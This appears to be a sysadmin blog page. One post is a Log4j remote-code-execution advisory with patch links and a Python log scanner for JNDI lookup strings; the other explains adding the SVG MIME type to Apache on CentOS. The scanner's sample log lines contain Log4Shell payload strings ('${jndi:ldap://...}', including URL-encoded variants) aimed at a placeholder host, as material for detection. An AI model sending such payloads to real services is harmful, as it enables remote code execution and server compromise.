Apache Log4j Zero-Day Vulnerability

Taken from https://www.lunasec.io/docs/blog/log4j-zero-day/

What is Apache Log4j Zero-Day Vulnerability?

Apache Log4j has a serious unauthenticated Remote Code Execution (RCE) vulnerability which was just disclosed. The exploit code for this has also been released, and the vulnerability is actively exploited in the wild. By crafting a special string that is passed to the application/service log via Log4j, attackers can execute arbitrary code loaded from remote servers. This can potentially lead to a complete compromise of the server.

What versions are vulnerable?

Any software using Apache Log4j (as a component) version between 2.0 and 2.14.1, inclusive.

What do I need to do?

A. Servers running custom Java application/services

  1. If your Log4j version is vulnerable, install the latest patched version log4j-2.15.0-rc2 available on GitHub at https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2.

B. Servers running Commercial off-the-shelf (COTS) products

  1. Please refer to https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 for a list of advisories from the major vendors and follow the relevant advisory.

How can I check if I have been hacked/compromised?

Check your applications’ log files for strings resembling “jndi:ldap”.
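
The log check above can be scripted. The following is an added example, not code from the original article or from the Log4j project: a Python scan that flags log lines containing a JNDI lookup string, including URL-encoded forms as they appear in access logs. The schemes other than ldap, the number of decoding rounds, and the sample log lines are assumptions constructed for illustration.

```python
import re
import sys
from urllib.parse import unquote

# The page names "jndi:ldap"; the other JNDI schemes are an added generalization.
JNDI_RE = re.compile(r"jndi:(ldaps?|rmi|dns|iiop)", re.IGNORECASE)

def decode_layers(line, max_rounds=3):
    """Undo up to max_rounds of URL-encoding, since query strings are logged encoded."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def scan_lines(lines):
    """Return (line_number, scheme, original_line) for every line with a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        match = JNDI_RE.search(decode_layers(raw))
        if match:
            hits.append((number, match.group(1).lower(), raw.rstrip("\n")))
    return hits

def scan_file(path):
    """Scan a log file, tolerating bytes that are not valid text."""
    with open(path, errors="replace") as handle:
        return scan_lines(handle)

# Constructed sample access-log lines (hosts and addresses are placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:09:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://host.invalid/x}"',
    '203.0.113.9 - - [10/Dec/2021:09:14:06 +0000] "GET /?q=%24%7BJNDI%3ALdap%3A%2F%2Fhost.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.9 - - [10/Dec/2021:09:14:07 +0000] "GET /?q=%2524%257Bjndi%253Armi%253A%252F%252Fhost.invalid%252Fx%257D HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.4 - - [10/Dec/2021:09:15:11 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_lines(SAMPLE_LOG)
    for number, scheme, line in hits:
        print(f"line {number}: jndi:{scheme} -> {line}")
```

A hit shows that a request carrying the string was logged; whether the host was actually compromised still has to be established from the Log4j version in use and from follow-up investigation.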

For more information

See https://www.lunasec.io/docs/blog/log4j-zero-day/

Adding SVG MIME Type to Apache on CentOS

What is MIME?

According to www.w3.org/services/svg-server:

MIME Types (sometimes referred to as “Internet media types”) are the primary method to
indicate the type of resources delivered via MIME-aware protocols such as HTTP
and email. User agents (such as browsers) use media types to determine whether
that user agent supports that specific format, and how the content should be
processed. When an SVG document is not served with the correct MIME Type in the
Content-Type header, it might not work as intended by the author; for example,
a browser might render the SVG document as plain text or provide a “save-as”
dialog instead of rendering the image.

Step 1: To add SVG to the list of supported MIME types, simply add these lines to your /etc/httpd/conf/httpd.conf. I have placed them at around line 786:

#
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
#AddType application/x-tar .tgz
AddType image/svg+xml svg svgz
# Only .svgz files are gzip-compressed; plain .svg files must not be marked as gzip-encoded.
AddEncoding gzip svgz

Step 2: Also ensure you have the following line in your /etc/mime.types:

image/svg+xml svg svgz

Step 3: Remember to restart Apache:

# service httpd restart

Step 4: Test the SVG with a sample script. It should show up on your web server.